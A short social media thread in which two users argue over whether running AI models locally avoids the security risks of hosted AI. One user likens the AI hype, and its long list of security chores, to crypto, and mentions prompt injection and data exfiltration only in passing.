another way "AI" is like crypto is dudes are like "this is awesome, you have to do it!!" and you're like "ok, but isn't a ton of it scams, fraud, and puts me in danger of getting hacked?" and they are like "yeah, but all you have to do is [HUGE LIST OF CONVOLUTED NEW INFOSEC THINGS TO LEARN]"

yeah, i am not doing that.

@peter Only applies if you don't run/own your own models. "Run Sovereign" "Compute at Home" ;)
@ManyRoads not really, local models can still get prompt-injected and exfiltrate your data if you're doing OpenClaw agentic workflows or whatever
@peter I think you might be confusing model vulnerability with systemic incompetence. If you run a local LLM on a machine with open egress, auto-rendering Markdown, and unsanitized inputs, you’ve just built a local version of a leaky cloud. A Sovereign AI run on a hardened, air-gapped, or egress-filtered node isn’t ‘exfiltrating’ anything—it’s the only way to actually ensure the data stays in the room.

@ManyRoads did you read my original post lol and I quote:

and they are like "yeah, but all you have to do is [HUGE LIST OF CONVOLUTED NEW INFOSEC THINGS TO LEARN]"

yeah, i am not doing that.

@peter Okie dokie
@ManyRoads (I am happy that people are figuring this stuff out and running models locally, just that, like crypto, there's a lot of esoteric risk involved, so it will probably never extend to the non-hobbyists)